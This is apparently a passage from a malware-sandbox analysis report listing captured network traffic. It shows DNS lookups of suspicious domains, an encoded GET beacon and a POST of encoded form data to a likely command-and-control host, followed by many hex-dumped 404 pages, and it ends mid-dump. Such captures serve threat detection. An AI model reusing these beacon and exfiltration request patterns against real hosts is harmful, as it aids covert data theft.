            Source: global trafficHTTP traffic detected: GET /ygu8/?8jT4kL=6HX0pmqtTVFjYjbLFt/yw4MxugQtjNvaEbfW/ZeSy8/cybJx0DosxviF56NjIHg0asFrzBUBKTTcW4Uj0RlF+pFAgVt32CComlEiYuQYw0DYsahVS2dFldI6ksNi8RRjHVW8r7I=&-pmdf=w6-PZpOHNlat HTTP/1.1Host: www.lucelight.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
            Source: global trafficDNS traffic detected: DNS query: www.carhireheaven.online
            Source: global trafficDNS traffic detected: DNS query: www.dy01urj.pro
            Source: global trafficDNS traffic detected: DNS query: www.openhorizons.pro
            Source: global trafficDNS traffic detected: DNS query: www.topkapiescortg.xyz
            Source: global trafficDNS traffic detected: DNS query: www.thezensive.work
            Source: global trafficDNS traffic detected: DNS query: www.lucelight.info
            Source: global trafficDNS traffic detected: DNS query: www.kevmedia.online
            Source: unknownHTTP traffic detected: POST /f425/ HTTP/1.1Host: www.dy01urj.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.dy01urj.proReferer: http://www.dy01urj.pro/f425/Cache-Control: no-cacheContent-Length: 211Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+Data Raw: 38 6a 54 34 6b 4c 3d 33 71 2b 42 32 72 54 6d 48 63 79 54 69 5a 71 37 68 4a 67 52 55 6d 4b 33 66 4d 45 39 68 48 47 65 4e 69 39 39 5a 6d 35 51 73 43 4f 71 7a 42 35 41 59 51 4b 75 38 54 70 2f 4d 7a 45 50 45 4c 43 72 66 4a 34 6a 61 68 74 5a 7a 52 62 64 76 62 57 48 2b 42 52 61 71 56 35 79 5a 2f 64 67 63 7a 76 53 61 48 44 4c 76 32 41 67 2b 69 55 42 45 36 75 35 45 73 6c 4f 4f 6d 4c 71 6c 55 65 38 62 51 7a 6a 77 37 2f 44 6f 4d 52 4b 53 37 39 32 76 44 56 68 32 6b 61 75 7a 34 53 39 71 42 70 55 36 6d 42 62 36 35 7a 6f 66 7a 58 5a 73 6f 46 32 53 38 4b 4f 31 67 35 56 48 33 49 63 32 76 53 62 37 47 6f 54 4e 65 52 77 54 63 38 42 73 33 4d 56 Data Ascii: 8jT4kL=3q+B2rTmHcyTiZq7hJgRUmK3fME9hHGeNi99Zm5QsCOqzB5AYQKu8Tp/MzEPELCrfJ4jahtZzRbdvbWH+BRaqV5yZ/dgczvSaHDLv2Ag+iUBE6u5EslOOmLqlUe8bQzjw7/DoMRKS792vDVh2kauz4S9qBpU6mBb65zofzXZsoF2S8KO1g5VH3Ic2vSb7GoTNeRwTc8Bs3MV
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Thu, 28 Nov 2024 09:06:46 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Nov 2024 09:07:18 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Nov 2024 09:07:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Nov 2024 09:07:23 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Nov 2024 09:07:26 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Nov 2024 09:07:33 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dhbHECWAR1vHgoaHiFRcY0nqh5rC4RhAW3wIl2UTgcz3o6gCPLujunNBLYfGDW3BHSFED1sbjqEnyJWbX0r2yOEtQpMHWcjJ0dcqxk2JTSHR3JkcUvJTY9awsYvfBbmqUBBL%2B0OCx30o"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e9935543f778c2d-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2057&min_rtt=2057&rtt_var=1028&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=785&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a Data Ascii: eaTn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(bY<;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Nov 2024 09:07:36 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mdJsoZlbpx560DUzWwQ6dklk5igLwiq3S6rp%2B9CwTDCjyRU93S5q8hQtUXCDQ7DjK3SoU1VdggVgALrQtuQB%2FvbStfVxkZvT%2BxsqT0URJSt5IOsPRl5HoQNfnl1MY%2F12LcBZURL3qAMR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e9935659bfc7c93-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2074&min_rtt=2074&rtt_var=1037&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=809&delivery_rate=0&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f5Tn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Nov 2024 09:07:38 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UFJosTQxsU%2BmrsVBTV5oOSQfHGQnvO7zdD4ntPc7OQEbEVcRWGZK4O%2BvoCMVraRsCGIPhFDiUUkMjVq7CboCG8vizCYV29w18yJgKcRtB7XRH3EwP%2BIXKPDDglt1ngA3Qc5DAowxCXJd"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e993576ea7b4231-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=8626&min_rtt=8626&rtt_var=4313&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1822&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a Data Ascii: f5Tn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Nov 2024 09:07:41 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=scG9ux1sn6VSXw1I65F1ZZHsjkroTWcvII7CtSm4Fv05xceUvp6QKBGm%2BoRdmbVUcBZldxbMmDR4%2BncqWjmjbpyTCdUybRJ2qfofsMdzM1iZuZO9TjW4J1I85yDXW07D5S7nL2OtSdr%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e993587cd0042c8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1787&min_rtt=1787&rtt_var=893&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=520&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlDate: Thu, 28 Nov 2024 09:07:48 GMTServer: NetlifyX-Nf-Request-Id: 01JDS0DK4RZ8T2Z8343P1TSEBQConnection: closeTransfer-Encoding: chunkedData Raw: 39 62 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 3a 23 41 33 41 39 41 43 3b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 42 67 41 70 70 3a 72 67 62 28 31 34 2c 20 33 30 2c 20 33 37 29 3b 2d 2d 63 6f 6c 6f 72 42 67 49 6e 76 65 72 73 65 3a 68 73 6c 28 31 37 35 2c 20 34 38 25 2c 20 39 38 25 29 3b 2d 2d 63 6f 6c 6f 72 54 65 78 74 4d 75 74 65 64 3a 72 67 62 28 31 30 30 2c 20 31 31 30 2c 20 31 31 35 29 3b 2d 2d 63 6f 6c 6f 72 45 72 72 6f 72 3a 23 44 33 32 32 35 34 3b 2d 2d 63 6f 6c 6f 72 42 67 43 61 72 64 3a 23 66 66 66 3b 2d 2d 63 6f 6c 6f 72 53 68 61 64 6f 77 3a 23 30 65 31 65 32 35 31 66 3b 2d 2d 63 6f 6c 6f 72 45 72 72 6f 72 54 65 78 74 3a 72 67 62 28 31 34 32 2c 20 31 31 2c 20 34 38 29 3b 2d 2d 63 6f 6c 6f 72 43 61 72 64 54 69 74 6c 65 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 53 74 61 63 6b 54 65 78 74 3a 23 32 32 32 3b 2d 2d 63 6f 6c 6f 72 43 6f 64 65 54 65 78 74 3a 23 46 35 46 35 46 35 7d 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 73 65 67 6f 65 20 75 69 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2c 61 70 70 6c 65 20 63 6f 6c 6f 72 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20 73 79 6d 62 6f 6c 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 34 33 38 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 68 31 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 2e 6d 61 69 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 77 69 64 74 68 3a 31 30 30 76 77
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlDate: Thu, 28 Nov 2024 09:07:51 GMTServer: NetlifyX-Nf-Request-Id: 01JDS0DNR2ACB1C4SHS4QGMYQYConnection: closeTransfer-Encoding: chunkedData Raw: 39 62 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 